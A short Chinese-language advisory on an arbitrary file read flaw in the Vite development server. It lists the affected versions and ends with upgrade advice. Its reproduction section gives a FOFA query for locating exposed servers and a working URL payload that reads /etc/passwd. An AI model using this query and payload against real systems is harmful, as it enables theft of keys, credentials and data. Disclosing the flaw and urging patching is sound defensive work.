Vite 开发服务器漏洞
漏洞危害
对于使用 Vite 老版本(包括但不限于 >=6.2.0, <=6.2.2;>=6.1.0, <=6.1.1;>=6.0.0, <=6.0.11;>=5.0.0, <=5.4.14;<=4.5.9)的开发者和企业运维人员来说,这是一个不容忽视的问题。因为攻击者只需在浏览器中输入特定的 URL,就有可能获取目标机器上的源码、SSH 密钥、数据库账号、用户数据等任意文件信息,从而导致敏感信息泄露。
漏洞再现
FOFA
body="/@vite/client"
在浏览器中输入 “http://[目标 IP]:5173/etc/passwd?raw”(以读取 etc/passwd 文件为例),即可成功读取系统文件内容。
修复建议
将 Vite 版本升级到官方公布的补丁版本,如 Vite 6.2.3、6.1.2、6.0.12、5.4.15、4.5.10 或更高版本,以获得官方修复后的安全保障。